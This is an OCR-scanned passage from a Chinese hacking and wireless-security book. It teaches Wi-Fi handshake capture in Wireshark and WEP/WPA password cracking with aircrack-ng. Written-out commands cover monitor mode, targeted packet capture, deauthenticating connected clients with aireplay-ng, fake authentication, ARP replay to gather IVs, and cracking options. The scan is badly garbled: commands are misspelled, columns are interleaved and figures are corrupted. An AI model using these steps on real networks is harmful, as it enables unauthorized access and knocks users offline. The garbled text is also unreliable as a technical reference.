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7.4 实战 演练 
实战 演练 1 一 一 筛选 出 无 线 通信 中 的 握手 信息 


筛选 无 线 通信 中 握手 信息 可 以 通过 以 下 几 个 步骤 进行 
将 网 卡 置 入 monitor 模 式 。 使 用 iw dev wlan0 interface add wlan0mon type monitor 命 令 
将 网 卡 置 入 monitor 模 式 ， 如 下 图 所 示 。 


rootG@kati:-# iw dev wlang interface add wlanemon type monitor 
root@kali:-# iwconfig 
wlangmon IEEE 892.11 Mode:Monitor Tx-Power=29 dBm 
Retry short long limit:2 RTS thr:off Fragment thr:off 
Power Management:off 


wlang IEEE 862.11 ESSID:off/any 
Mode:Managed Access Point: Not-Associated Tx-Power=29 dBm 
Retry short long limit:2 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management:off 


lo no wireless extensions. 


ethg no wireless extensions. 


使 用 ifconfig wlan0mon up 命令 ， 将 新 创建 的 无 线 网 卡 启 动 ， 如 下 图 所 示 。 


root@kali: -# ifconfig wlangnon up 
root@kali: -# ifconfig 
etho: flags=4163<UP, BROADCAST,RUNNING,MULTICAST> mtu 1500 
inet6 fe89: ;29c:29ff;fe7f:39f2 prefixlen 64 scopeid 6x29<Link> 
ether 90:0c:29:7f:39:f2 txqueuelen 1060 (Ethernet) 
RX packets 14827 bytes 29948396 (19.1 MiB) 
RX errors 9 dropped 6 overruns 9 frame © 
TX packets 4945 bytes 311322 (304.9 KiB) 
TX errors 9 dropped 6 overruns © carrier 9 collisions @ 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 
inet 127.0.0.1 netnask 255.0.0.0 
inet6 ::1 prefixlen 128 scopeid xl0<host> 
loop txqueuelen 19890 (Local Loopback) 
RX packets 164 bytes 8356 (8.1 KiB) 
RX errors 9 dropped @ overruns 9 frame 9 
TX packets 164 bytes 8356 (8.1 KiB) 
TX errors 9 dropped 6 overruns 9 carrier 9 colllsions © 


wlanonon: flags=4153<UP,BROADCAST, RUNNING, MULTICAST> ntu 1590 
unspec E8-4E-66-28-AE-46-99-99-69-99-99-99-69-66-99-99 txqueuelen 1999 (UNSPEC) 
RX packets 102 bytes 15139 [14.7 KiB 
RX errors 9 dropped @ overruns 9 frame 9 
TX packets 0 bytes 9 (9.9 B) 
TX errors 9 dropped 6 overruns 9 carrier 9 collisions 9 


四 启动 Wireshark 抓 包工 具 ， 选 择 wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 


Capture 
.using this filter: 


ethO 
any 一 
Loopback: lo 
nftog 
Learn 
Ee 在 抓 取 到 的 数据 包 中 筛选 并 标记 出 握手 信息 数据 包 ， 如 下 图 所 示 。 


Destination Protocol Length Info 
VivoMobi_aB: fa EEEB [RA] 862.41 16 Request -to-send, Flags= 
二 jC ags= 


319 A 1eduenent 
VivoMobi_aB:f3:a3 《88: EE 5 36 Acknowledgenent, 
VivaMobi_aB:f3: : 16 Request -to-send, 
VivoMobi_a8:f3; :23:b2:a8: 16 Request -to-send, 
VivoMobi_a8 a 16 Request -to-send, 


VivoMobi as 
VivoMobi_ag8 
VivoMobi_aB: 
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SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


step 图 选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “导出 特定 分 组 ”菜单 命令 ， 寻 出 
拉 训 后 靖 扒 下 司 起 扣 丘 ， 如 下 图 所 示 。 


Wireshark- Export Specified Packets 


-大 小 
a pubtc 
文 作 名 称 (J : est] 
Exporas Wireshartcpdump/- -paap 
Packet Range Compress wan grip 
Captured 5 Displayed 
Al packets 8975 
Selected packets only 
® Marked packets only 6 
Pstietetmarked 了 
Range o 


实战 演练 2 一 一 快速 定位 身份 验证 信息 数据 包 


通过 Wireshark 抓 取 到 整个 握手 过 程 数 据 包 后 ， 用 户 可 以 通过 以 下 步骤 来 快速 定位 ， 精 
确定 位 到 身份 验证 数据 包 。 
通过 Wireshark 打 开 抓 取 到 的 握手 信息 数据 包 ， 如 下 图 所 示 。 


Open 


step 回 在 筛选 条 件 文本 框 中 输入 eapol 筛 选 条 件 ， 如 下 图 所 示 。 


No. Time Sourre Destnation, Protocol Length iio 


r tos on wire (4890 bats), 237 eytos captured (806 bits) 
; ee Ee a es Dota, Flo 

， Logleal-Lin 

on 


[step 图 单 去 右 侧 的 区 3 按钮 ， 即 可 展开 身份 验证 信息 ， 如 下 图 所 示 。 


， IEEE 892.11 Qo5 Dara，F180s: F 
， Logical-Link Control 


Version: 892.1X-2994 (2) 


了 
6cbeg9911f4c4c2a4453356ddd9973f3cg6a73cbae5adf1. .. 
88899909000c6666666665699998 

e00000ooose 


etSt0dn, 58ffhdaa1g89fbfsTecda 


7.5 “小 试 身 手 


练习 1: 使 用 Wireshark 进 行 抓 包 。 
练习 2: 使 用 筛选 器 筛选 出 需要 的 数据 包 。 
练习 3: 如 何 对 数据 包 进 行 标 记 并 导出 这 些 标记 的 数据 包 。 
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第 8 音 ”无 线路 由 硕 的 密码 安 


全 策略 


无 线路 由 器 的 加 密 方式 包括 WEP、WPA 与 WPS 三 种 ， 针 对 不 同 的 方式 ， 破 解密 码 的 工 


具 以 及 安全 维护 方式 都 不 同 。 


8.1 破解 密码 前 的 准备 工作 


在 开始 破解 密码 之 前 需要 有 一 些 准备 
工作 ， 这 里 需要 用 户 购买 一 个 无 线 网 卡 ， 
该 网 卡 需 要 适合 kali 虚 拟 机 ， 一 般 atheros 芯 
片 的 无 线 网 卡 可 以 安装 在 kali 虚 拟 机 中 ， 不 


过 ， 为 确保 购买 的 网 卡 正 确 ， 购 买 前 请 认 
真 询问 是 否 支 持 kali 虚 拟 机 。 
8.1.1 查看 网 卡 信息 


无 线 网 卡 购买 后 ， 下 面 就 可 以 查看 网 
卡 的 信息 了 ， 包 括 网 卡 模式 、 网 卡 信息 、 
网 卡 映 射 信息 等 。 具 体操 作 步 又 如 下 ; 
查看 网 卡 模式 。 使 用 iw list 命 令 查看 
网 卡 的 信息 。 下 图 为 执行 效果 。 这 里 显示 
出 来 的 模式 是 该 网 卡 所 支持 的 所 有 模式 。 


| Supported interface modes: 


[step 图 在 Kali 0 中 输入 
ifconfig -a 命令 过 这 个 命令 可 以 查看 本 
机 所 有 网 卡 信息 ，- ee 
机 中 没有 无 线 网 卡 ， 如 下 图 所 示 。 


ee reonrig a 
BR 
1 


managed 

AP 
AP/VLAN 
monitor 
mesh point 


Pe 


collisions © 


工具 栏 中 的 “虚拟 机 ”菜单 项 ， 在 弹出 
的 菜单 列表 中 选择 “可 移动 设备 ”菜单 
命令 ， 再 从 “可 移动 设备 ”菜单 列表 中 选 
择 相 应 的 无 线 网 卡 并 进行 连接 ， 如 下 图 
所 示 。 


ld eo we 


[es 加 此 时 会 弹出 一 个 提示 框 ， 询 问 是 否 连 
eg 单 击 “ 确 定 ” 按 钮 ， 如 下 图 
所 示 。 


kali-linux-2018.3-vm-amd64 - VMware Workstation x| 


停止 以 实现 安全 黎 除 。 对 于 某 些 设备 ， 主 机 可 能 会 显示 消息 现 
在 可 以 安全 地 移 除 设备 。 


口 不 再 显示 此 消息 (S) 


[27 i US8 设备 插 要 从 主机 据 出 并 连接 到 该 虚拟 机 。 该 设备 将 先 


Cm] ww 


step 图 再 次 运行 ifconfig -a 命令 。 这 时 会 多 出 
一 个 wlan 开 头 的 网 卡 ， 这 就 是 无 线 网 卡 ， 
A 


1500 
.157. 131 “netmas 5255 255 dcast 192.168,157.255 
e291: es ep efixlen 4 Meopels Ox20<Uink> 

he 


™ Wa) 
TX efrers 9 dropped 0 overruns © carrier © collisions @ 
ag5=73<UP, LOOPEACK, RUNNING> mtU 65536 
inet 127.8.0.1 nermask 255.0.9.0 
1 


step 园 使 用 Gs ”和 


step 图 将 网 卡 映射 进 虚 拟 机 ， 选 择 vmware 


卡 信 息 ， 下 图 为 执行 效果 。 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


[rootakali# iweontig 
四 no wireless extensions 


tane IEEE 882.11 ESSID:"TPGuest 6073" 
Mode:Managed Frequency:2.437 GHz Access Point: 86:83:CD:33:68:73 
Bt Rate=l Nb/s Tx-Power=20 dB 
Retry short long Limit:z RTS thr:off Fragnent thr:off 
Encryption key:off 
Power Managenent:off 
Link quality=70/76 signal tevet=-17 dan 
Rx invatid nwid:@ Rx invalid crypt:9 Rx invalid frag:0 
Tx excessive retries:25 Invalid misc:0 Missed beacon:0 


letha ”no wireless extensions. 


六 加 可 以 抓 取 802 11 无 线 通信 协议 ， 配 置 网 卡 进 


的 入 混杂 模式 的 操作 步骤 如 下 : 
“IStep 轩 使 用 iw dev wlan0 interface add 
wlan0mon type monitor 命 令 可 以 将 一 个 网 卡 
植 入 混杂 模式 ， 如 下 图 所 示 。 其 中 dev 后 面 
跟 的 是 具体 无 线 网 卡 的 名 称 ， 新 增加 的 网 
卡 名 称 必须 是 wlan+ 一 个 数字 +mon 形 式 。 
[rootakali: # iw dev WUang interTface add wlangnon type monitor 
设置 完成 后 ， 运 行 iwconfig 命 令 ， 查 
看 无 线 网 卡 信息 ， 如 下 图 所 示 。 其 中 会 多 
出 一 个 wlan0mon 无 线 网 卡 ， 并 且 模 式 是 


monitor (混杂 模式 ) 。 


TOaHENRUTW TIW dev YUNG INIETTSCE add WIanonon type Wonitor 
Iroot@hali: -# twconfig 
to no wireless extensions. 


anonon IEEE B02.11 Mode:Monitor Tx-Power=20 den 
Retry short tong linit:2 RTS thrioff Fragnent thr:oft 
Power Management:off 


Wang IEEE B02.11 ESSID:*TPGuest 6073" 
Mode:Managed Frequency:2.437 GHz Access Point: 86:83:CD:33:60:73 
BIT Rate=l Mb/s Tx-Power=20 dBm 
Rerry short Tong linit:2 RTS thrioff Fragnent thr:off 
Encryption key:oft 
Power Managenent:off 
LInk guattty=18// Signal ievet=-17 dum 
Rx invalid mwad:8 Rx invalid crypt:9 Rx invalid frag:9 
Tx excessive retries:25 Invalid nisc:9 Missed beacon: 


etho no wireless extensions 


[step 图 执行 ifconfig wlan0mon up 命令 ， 将 
新 加 入 的 无 线 网 卡 启 用 ， 再 次 运行 ifconfig 
命令 ， 可 以 看 到 网 卡 列表 中 已 经 启用 的 
wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 此 时 使 
用 Wireshark 抓 包 软 件 便 可 以 抓 取 802.11 无 线 
通信 协议 数据 包 了 。 


anomon: flags=4153<UP, BAOADCAST, RUNNING, MULTICAST> mtu 1506 
unspec E8-4E-66-28-AE-46-38-3A-90-69-69-09-99-99-66-06 txaueuelen 1069 
《omspEC) 
RX packets 2368 bytes 366342 (351.8 KiB) 
RX errors a dropped 2308 overruns 9 frame @ 
Tx packers @ bytes 9 (9.9 8) 
TX errors 8 dropped 8 overruns 9 carrier 9 collisions 日 


8.2 ”密码 破解 工具 一 一 aircrack 


aircrack 是 目前 WEP/WPA/WPA2 破 解 领 
域 中 最 热门 的 工具 ，aircrack-ng 套 件 包含 的 
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工具 能 够 捕捉 数据 包 和 握手 包 ， 生 成 通信 数 
据 ， 或 进行 暴力 破解 攻击 以 及 字典 攻击 ， 
该 套件 包含 airmon-ng、aircrack-ng、aire- 
play-ng、airodump-ng、airbase-ng 等 工具 。 


8.2.1 airmon-ng 工 具 


airmon-ng 工 具 属于 aircrack-ng 套 件 中 的 
一 种 ，airmon-ng 用 来 实现 无 线 接口 在 man- 
aged 和 monitor 模 式 之 间 的 转换 及 清除 干扰 
进程 。 

使 用 airmon-ng 工 具 的 操作 步 又 如 下 : 
运行 airmon-ng 命 令 ， 即 可 查看 无 线 网 
卡 的 驱动 芯片 信息 ， 如 下 图 所 示 。 


oA UT TN 


PhY lntertace Driver chipset 


phyl 。 muang rr2seeusb Ralink Technotogy，corp。RT2878/RT3978 


运行 airmon-ng --h 命 令 ， 即 可 查看 
arimon-ng 工 具 的 命令 格式 ， 如 下 图 所 示 。 


reotekati:-# airnon-ng --h 


usage: airmon-ng <start|stoplcheck> <interface> [channet or frequency， 


[step 图 运行 airmon-ng check 命 令 ， 即 可 查看 
有 哪些 进程 会 影响 到 aircrack-ng 套 件 的 工 
作 ， 如 下 图 所 示 。 


POOTORALIT -# SIrTON -ng Check 


IFound 4 processes that could cause trouble 

Kill then using 'airmen-ng check kill' before putting 

|the card in monitor mode, they will interfere by changing channels 
land sonetines putting the interface back in managed mode 


PID Nane 
484 NetworkManager 
569 wpa_suppticant 
2736 dhclient 

4492 dhclient 


侈 提示 : 查询 完成 后 ， 用 户 可 以 通过 kill 
命令 加 进程 PID 号 终止 相关 进程 ， 但 是 air- 
Imon-ng 工 具 提供 了 一 个 简便 的 方法 ， 就 是 
运行 airmon-ng check kill 命 令 ， 就 可 以 将 干 
扰 进 程 直 接 中 断 运行 。 另外， 为 了 保证 抓 
取 数 据 包 能 顺利 执行 ， 建 议 用 户 执 行 sService 
network-manager stop 命 令 ， 停 止 网 络 管 
理 器 的 运行 ， 因 为 这 个 服务 会 影响 抓 取 数 
据 包 。 


step 园 当 配 置 完成 后 ， 运 行 airmon-ng start 


wlan0 命 令 ， 将 无 线 网 卡 植 入 混杂 模式 ， 如 
下 图 所 示 。 


[oo rn ng start wong 


[Found 2 processes that could cause trouble 
[CLLL then using 'airmon-ng check kill’ before putting 

lthe card in nonitor node, they will interfere by changing channels 
land sometimes putting the interface back in managed node 


PID Nane 
569 wpa supplicant 
2736 dhciient 

pry Interface 


Driver chipser 


paya wlane rtzasaeush Ralink Technatogy，corp，RT287B/RT3878 
《mac8e211 nonitor mode vif enabted for [phys]wlane on fphysJvtaneon) 


《mac89211 station mode vif disabled for [phy#]wiang) 
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tH IU Elapsed: 6 s 1{ 2619-19-13 67:11 


5srp PR PR Beacons sData, #/s CH Me ENC CIPHER AUTH ESSID 
csFAs68:01:2F:00 -1 © a 3 4 EP WEP <length: 0> 
assm sTATION PR Rate Lost Frames Probe 
IcsFA:68:01:2F:08 DC:6D:CD:66:FE:C -16 8-6e 29 20 


@ 侈 提示 : 抓 取 数据 分 为 两 块 显示 ， 第 一 个 
BSSID 代 表 AP 端 的 数据 ， 第 二 个 BSSID 代 
表 STA 端 的 数据 ， 当 指定 信道 抓 取 数 据 后 会 
多 出 一 个 RXQ 字 段 。 


step 图 运行 ifconfig 命 令 ， 可 以 查看 网 卡 信 
息 ， 下 图 为 执行 效果 。 


[ononon TUags=4153<UP ,6ROADCAST, RUNNTNG MUCTICAST> RE 1560 
5pec EB-4E-96-28-AE-46-38-3A-00-99-66-60-60-99-68-66 txqueueten 1999 (UNSPEC) 


RX errors 0 dropped 8364 overruns 0 frane 9 
TX packets 9 bytes 9 (9.0 6) 


TX errors 9 dropped 9 overruns 9 carrier 0 collisions 9 


( 斧 提 示 : 通过 airmon-ng 工 具 可 以 快速 配置 
网 卡 进入 混杂 模式 并 启动 新 加 入 的 无 线 网 
卡 ， 这 个 原理 同 手动 设置 是 一 样 的 。 


8.2.2 airodump-ng 工 具 


airodump-ng 工 具 是 aircrack-ng 套 件 中 用 
于 抓 取 数 据 包 的 工具 。 使 用 airodump-ng 工 
具 的 操作 步骤 如 下 : 
抓 取 网 络 数 据 包 。 运 行 airodump-ng 
wlan0mon 命 令 ， 进 入 轮 询 模式 ， 并 抓 取 网 
络 数据 包 。 下 图 为 抓 取 的 信息 。 其 中 ，CH 
代表 信道 ，airodump-ng 会 从 网 卡 最 小 信道 
到 最 大 信道 循环 抓 取 数 据 包 ， 每 间隔 1s 更 换 
一 个 信道 。 


CH 2 JU Elapsed: 0 5 | 2010-10-13 95:59 


551D Pm Beacons soata, ¢/s CH Ma ENC CIPHER AUTH ESSID 


00:2F:09:C3:57:9D -58 和 日 13 138 WPA CCMP Psk ChinaNet-DysG 
7O:AF:6A:09: LE:9D -59 2 日 日 13 139 WPAZ CCMP PSK TP734613852 
38:21:87:86:20:AB “44 9 0 7 65 WPAZ CCMP PSK midea ac 0962 
B84:15+13:8C:10:A2 -55 a 2 9 1 -1 op <length:” 6> 
4:55:A3:70:37:92 43 1 3 0 1 54e. opN CMC 
BssID STATION PuR Rate Lost Franes Probe 
84:15:13:8C:10:A2 FO:79:E8:41:80:07 -1 le-@ 2 

E468:A3:7D:37:92 1C:DD:EA:93:97:FB -1 le-0 8 3 


[step 图 抓 取 指 定数 据 。 运 行 airodump-ng 
-Cc 1 --bssid 1C:FA:68:01:2F:08 -w wep002 
wlan0mon 命 令 ， 该 命令 只 抓 取 信道 为 1、 
BSSID 的 MAC 地 址 为 1C:FA:68:01:2F:08 的 
流量 包 ， 并 将 抓 取 的 数据 包 保存 为 wep002 
的 文件 。 下 图 为 运行 结果 。 


[step 图 捕获 认证 过 程 。 当 ariodump-ng 工 
具 捕 获 到 STA 与 AP 的 认证 过 程 ， 会 多 出 
keystream 字 段 ， 该 字段 也 被 称 为 密 钥 流 ， 
便 有 可 能 计算 出 无 线路 由 的 认证 密码 ， 如 
下 图 所 示 。 


tm UIT Elapsed 1 39181919 67199 IT 149 bytes Keystreanm ICHRA16619112F169 


BssID PhR RxO Beacons #0ata, #/s CH MB ENC CIPHER AUTH ESSID 
1C:FA:68:01:2F:68 -2 31 121 1 5 1 Ste. WEP WEP SKA Test-001 
Bs51D STATION Pm Rate Lost franes Probe 


1c:FAi68:91:2F:68 DC:6D:CD:66:FE:CB -14 9 -se 56 19 Test-091 


8.2.3 aireplay-ng 工 具 
[hss 


aireplay-ng 是 一 个 注入 帧 的 工具 ， 主 绕 
要 作用 是 产生 数据 流量 。 这 些 数 据 流 量 会 加 
被 用 于 aircrack-ng， 从 而 破解 WEP 和 WPA/ 
WPA2 秘 钥 。 aireplay-ng 里 包含 了 很 多 种 
不 同 的 发 包 方式 ， 用 于 获取 WPA 握 手包 ， 中 
aireplay-ng 当 前 支持 的 发 包 种 类 有 9 种 ， 如 
下 图 所 示 。 


FEEacK madss (runbers can SETTU De 0566JT 


deauth count : deauthenticate 1 or all stations (-6 

fakeauth delay : fake authentication with AP (-1 
--interactive interactive frame selection (-2 
--arpreptay standard ARP-request replay (-3 
--chopchop decrypt/chopchop WEP packet (-4 
--fragment yenerates Vatid keystream  (-5) 
-~-caffe-latte query a client for new IVs (-6) 
--cfrag gments against a client (-7 
-~-migmode acks WPA migration mode (-8) 


--test : tests injection and quality (-9) 


含义 。 
e --deauth count: 解除 认证 。 
e --fakeauth delay: 伪造 认证 。 
e --interactive: 交互 式 注 入 。 
e --arpreplay: ARP 请 求 包 重 放 。 
四 
四 
. 


--chopchop: 端点 发 包 。 

--fragment: 碎片 交错 。 

--caffe-latte: 查询 客户 端 以 获取 新 
的 IVs。 
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e --cfrag: 面向 客户 的 碎片 。 主要 参数 介绍 如 下 : 
e --migmode: WPA 迁 移 模式 。 e -x nbpps: 设置 每 秒 发 送 数据 包 的 
e --test: 测试 网 卡 可 以 发 送 哪 种 类 型 数目 。 

的 数据 包 。 e -p fctrl: 设置 控制 帧 中 包含 的 信息 
除了 解除 认证 〈-0) 和 伪造 认证 (-1) 〈 十 六 进 制 ) 。 


以 外 ， 其 他 所 有 发 包 都 可 以 使 用 下 面 的 过 e@ -abssid: 设置 接 入 点 的 MAC 地 址 。 
滤 选 项 来 限制 数据 包 的 来 源 。-b 是 最 常用 的 e -c dmac: 设置 目的 MAC 地 址 。 
一 个 过 滤 选 项 ， 它 的 作用 是 指定 一 个 特定 e -hsmac: 设置 源 MAC 地 址 。 
的 接 入 点 。 下 图 为 帮助 信息 。 e -g value: 修改 缓冲 区 的 大 小 (默认 
TUEEF options™ 值 : 8) 。 
De Ea e -F: 选择 第 一 次 匹配 的 数据 包 。 
Wen nin pocket Vergth e -e essid: 虚假 认证 中 ,设置 接 入 点 
J 名 称 。 
| e -onpckts: 每 次 发 包 时 包含 数据 包 的 
Oe 数量 
主要 参数 介绍 如 下 ; e -q sec: 设置 持续 活动 时 间 。 
e -bbssid : 接 入 点 的 MAC 地 址 。 e -y prga: 包含 共享 秘 钥 的 关键 数 
e -ddmac: 目的 MAC 地 址 。 据 流 。 
e -ssmac: 源 MAC 地 址 。 aireplay-ng 有 两 个 获取 数据 包 来 源 ， 第 
e -mlen: 数据 包 最 小 长 度 。 一 个 是 无 线 网 卡 的 实时 通信 流 ， 第 二 个 则 
e -nlen: 数据 包 最 大 长 度 。 是 pcap 文 件 。 大 部 分 商业 的 或 开源 的 流量 
e -utype: 含有 关键 词 的 控制 帧 。 捕获 与 分 析 工 具 都 可 以 识别 标准 的 pcap 文 
e -vsubt: 含有 表单 数据 的 控制 帧 。 件 。 从 pcap 文 件 读 取 数 据 是 Aireplay-ng 一 
e -ttods: 到 目的 地 址 的 控制 帧 。 个 经 常 被 忽视 的 功能 。 这 个 功能 可 以 从 捕 
. 


-f fromds: 从 目的 地 址 出 发 的 控 ” 捉 的 其 他 会 话 中 读 取 数 据 包 。 注 意 ， 有 很 
制 帧 。 多 种 发 包 会 在 发 包 时 生成 pcap 文 件 以 便 重 
e -wiswep: 含有 WEP 数 据 的 控制 帧 。 复 使 用 。 
当 需 要 重 放 〈 注 入 ) 数据 包 时 ， 会 用 当 抓 取 指定 AP 与 数据 时 ， 如 果 想 要 抓 
到 重 放 选项 中 的 参数 ， 但 是 并 不 是 每 一 种 ， 取 密 钥 必须 在 AP 与 STA 开 始 建立 关联 时 开 
发 包 都 能 使 用 所 有 的 选项 。 下 图 为 重 放 选 ” 始 ， 此 时 如 果 已 经 有 合法 关联 的 STA， 为 
项 帮助 信息 。 了 避免 一 直 等 待 它们 重新 关联 ， 可 以 使 用 


RepLaYy OptIons airepaly-ng -0 < 发 包 次 数 > -a <AP 的 MAC 地 
ee el 址 > -c <STA 的 MAC 地 址 > wlan0mon 命 令 ， 
二 名 2 : en Me adoress 运行 效果 如 下 图 所 示 ， 将 已 经 关联 的 STA 与 
te 0 AP 断 开 连接 ， 正 常情 况 下 STA 与 AP 会 自动 


Fakeauth artack options 重 连 。 


-e essid : 二 ee AP SSID 


a npckts : of packets per burst (9=auto，defautt: 1) 
qsec i: Seon” demen den: Eatives 

-9 : send ti sts 

-yprga : Keystr en or hared Rey auth 

Tn : exit after retry fake auth request n tine 


Arp Replay attack options: 


其 中 -0 后 面 的 参数 为 发 包 次 数 ， 如 果 指 


i : iniect FromDs packets 
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定 为 0 表示 不 停 地 发 送 。-c 后 面 的 参数 为 需 
要 解除 关联 的 客户 端 MAC 地 址 ， 如 果 不 指 
定 将 会 以 广播 的 形式 发 送 ， 解 除 所 有 与 AP 
关联 的 客户 端 。 

使 用 抓 取 到 的 密 钥 流 进行 关联 ， 可 以 
使 用 aireplay-ng -1 < 间隔 时 间 > -e <ESSID> 
-y < 密 钥 流 文件 > -a <AP-MAC 地 址 > -h < 需 
要 关联 的 客户 端 MAC 地 址 > 命令 ， 执 行 后 如 
下 图 所 示 。 


Footakat 


| 
当 无 线路 由 使 用 WEP 进 行 加 密 时 ， 
破解 密码 需要 抓 取 大 量 的 IV 值 ， 可 以 采 
用 抓 取 一 段 合 法 ARP 数 据 包 ， 然 后 使 用 
areplay-ng 工 具 发 送 大 量 的 ARP 数 据 包 ， 这 
种 方式 叫 重 放 ， 也 就 是 合理 数据 重复 发 
送 使 得 AP 大 量 回应 ARP， 在 回应 ARP 数 
据 包 中 包含 IV。 这 种 方式 前 提 是 必须 先 
建立 关联 ， 通 过 重 放 便 可 以 收集 IV 值 。 当 
收集 到 足够 数量 的 IV 时 ， 无 论 多 复杂 的 密 
码 都 可 以 被 计算 出 来 。 执 行 aireplay-ng -3 
-b <AP-MAC 地 址 > -h < 本 机 MAC 地 址 > 
wlan0mon 命 令 便 可 以 开始 重 放 ， 如 下 图 
所 示 。 


[ee 
ba: 


8.2.4 aircrack-ng 工 具 


aircrack-ng 是 一 个 802.11 的 WEP 和 WPA/ 
WPA2-PSK 破 解 程序 工具 。 一 旦 使 用 airo- 
dump-ng 抓 取 足 够 多 的 加 密 数 据 包 以 后 ， 
aircrack-ng 可 以 用 来 破解 WEP 密 钥 。 

aircrack-ng 破 解 WEP 密 钥 有 3 种 方法 ， 
分 别 是 : PTW 方 法 、FMS/KoreK 方 法 和 词 
典 比 对 方法 。 

(1) PTW (Pyshkin, Tews, Wein- 
mann) 方法 。 是 破解 WEP 密 钥 的 默认 方 
式 ， 由 两 个 阶段 组 成 。 第 一 个 阶段 是 air 
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crack-ng 只 使 用 ARP 包 ， 如 果 找 不 到 密 钥 ， 
再 尝试 捕捉 到 的 其 他 数据 包 。 要 知道 ， 并 
不 是 所 有 的 数据 包 都 可 以 用 来 进行 PTW 破 
解 。 目 前 PTW 方法 只 能 破解 40 位 和 104 
位 的 WEP 密 钥 。PTW 方法 的 优点 是 ， 只 
须 很 少 的 数据 包 就 可 以 破解 WEP 密 钥 。 

(2) FMS/KoreK 方法 。 包 含 了 很 多 统 
计 攻 击 方式 ， 并 且 结合 了 暴力 破解 方式 。 

(3) 词典 比 对 方法 。 而 对 于 WPA/ 
WPA2-PSK 共享 密 钥 ， 只 有 词典 比 对 这 一 
种 方法 。SEE2 则 可 以 极 大 地 加 速 这 个 漫长 
的 比 对 过 程 。 破 解 WPA/WPA2-PSK 时 ， 需 
要 一 个 四 次 握手 包 作 为 输入 。 对 于 WPA 来 
说 ， 需 要 4 个 包 才能 完成 一 次 完整 的 握手 ， 
然而 aircrack-ng 只 要 其 中 的 两 个 就 能 够 开 
始 工作 了 。 

使 用 aircrack-ng 命 令 查看 其 帮助 信息 。 
下 图 为 执行 效果 。 
Aircrack-ng 1.4 - (C) 2666-2618 Thomas drOtreppe 
https://www.aircrack-ng.org 
usage: aircrack-ng [options] <input file(s)> 


-a <amode> : force attack mode (1/WEP, 2/WPA-PSK) 


-e <essid> : target selection: network identifier 
-b <bssid> : target selection: access point's MAC 
-p <nbcpu> : # of CPU to use (default: all CPUs) 
-q : enable quiet mode (no status output) 
-C <macs> : merge the given APS to a virtual onel 
-L <file> : write key to file. Overwrites file. 


主要 参数 介绍 如 下 : 

e -a <amode>: 强力 攻击 模式 (1/ 
WEP, 2/WPA-PSK) 。 

e -e <essid>: 目标 选择 : 网 络 标识 
符 。 

® -b <bssid>: 
MAC。 

e -p <nbcpu>: 使 用 的 CPU 〈 默 认 : 所 
有 CPUD 3 

。-q: 启用 静音 模式 (无 状态 输 
出 ) 。 

e -C <macs>: 将 给 定 的 AP 合并 到 一 
个 虚拟 的 AP。 

e -1<fle>: 写 入 文件 密 钥 。 


目标 选择 : 接 入 点 的 
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gy 、 ， i 

下 图 为 WEP 设 置 相关 的 选项 。 e -s: 破解 时 显示 密 钥 的 ASCII 值 。 
BStatic WEP cracking options: @ -M <num>: 指定 最 大 使 用 的 IVs 

-c : search alpha-numeric characters onty| (初始 向 量 ) 。 

-t : search binary coded decimal chr only 

-h : search the numeric key for Fritz!BOX e -D: WEP 伪 装 ， 跳 过 坏 掉 的 密 

-d <mask> : Use masking of the key (Al:XX:CF:YY 

-m <maddr> : MAC address to filter usable packetsl 钥 流 。 

-n <nbits> : WEP key length : 64/128/152/256/512 

-i <index> : WEP key index (1 to 4), default: any e -P <num>: PTW 排 错 :1: 取 消 Klein 

-f <fudge> : bruteforce fudge factor, default: 2 

-k <korek> : disable one attack method (1 to 17) 2:PTW 

x or -x0 : disable bruteforce for last keybytes| (方式 ) ，2: 

-xl : last keybyte bruteforcing (default) @ -1， 只 运行 一 次 学 

-x2 : enable last 2 keybytes bruteforcing 1: 只 运行 一 次 尝试 用 PTW 破 解 

-Xx : disable bruteforce multithreading 密 钥 

: experimental single bruteforce mode by 

K : use only old korek attacks (pre-PTW) PR A 人 

s : show the key in ASCII while cracking| V: 在 目 视 检查 模式 下 运行 。 

M<num>  : specify maximum number of IVs to use y 9 

-D : WEP decloak, skips broken keystreamsl 下 图 为 WEP 和 WPA-PSK 破 解 选项 

P <num> : PTW debug: 1: disable Klein, 2: PTW 

1 : run only 1 try to crack key with PT™W WEP and WPA-PSK cracking options: 

V : run in visual inspection mode 


-W <words> : path to wordlist(s) filename(s) 
主要 参数 介绍 如 下 : -N <file> : path to new session filename 
-R <file> : path to existing session filenam 
e -c: 只 搜索 字母 数字 字符 。 
。-t: 只 搜索 二 进 制 编码 的 十 进 制 主要 参数 介绍 如 下 : 
字符 。 e@ -w <words>: 路 径 表 (s) 的 文件 名 
(Cs) 5 


e -h: 搜索 弗 里 茨 的 数字 键 。 

e -d <mask>: 使 用 密 钥 过 滤 〈Al:XX: 
CRYYY 

e -m <maddr>: MAC 地 址 用 以 过 滤 掉 
无 用 数据 包 。 


e -N <file>: 新 会 话 文件 名 的 路 径 。 
e@ -R <file>: 现 有 会 话 文件 名 的 路 径 。 
下 图 为 WPA-PSK 的 一 些 选项 。 


WPA-PSK Options: 


e -n<nbits>: WEP 密 钥 长 度 : -E <file> : create EWSA project file v3 
-j <file> : create Hashcat v3.6+ file (HCCAPX 
64/128/152/256/512 -] <file> : create Hashcat file (HCCAP) 
Cm -5 ; WPA cracking speed test 
e -1i<index>: WEP 密 钥 索 引 (1 一 -Z <sec> : WPA cracking speed test length of 
execution. 
4) 了 默认 值 : 任何 。 -r <DB> : path to airolib-ng database 


(Cannot be used with -w) 


主要 参数 介绍 如 下 : 

e -E<file>: 创建 项 目 文件 EWSA v3。 
e -J <file>: 创建 Hashcat 捕 获 文件 。 
。 -S: WPA 破 解 速度 测试 。 


e -f <fudge>: 穷 举 猜测 因子 ， 默 认 
值 : 2。 

® -k <korek>: 
六 

e -x or -x0: 最 后 一 个 密 钥 字 节 进行 穷 
举 (默认 ) 。 

e -xl: 取消 最 后 一 个 密 钥 字 节 的 穷 举 
(默认 ) 。 

e -x2: 设置 最 后 两 个 密 钥 字 节 进行 
穷 举 。 

e -X: 禁用 多 线程 穷 举 。 

e -y: 实验 性 的 单一 穷 举 模式 。 
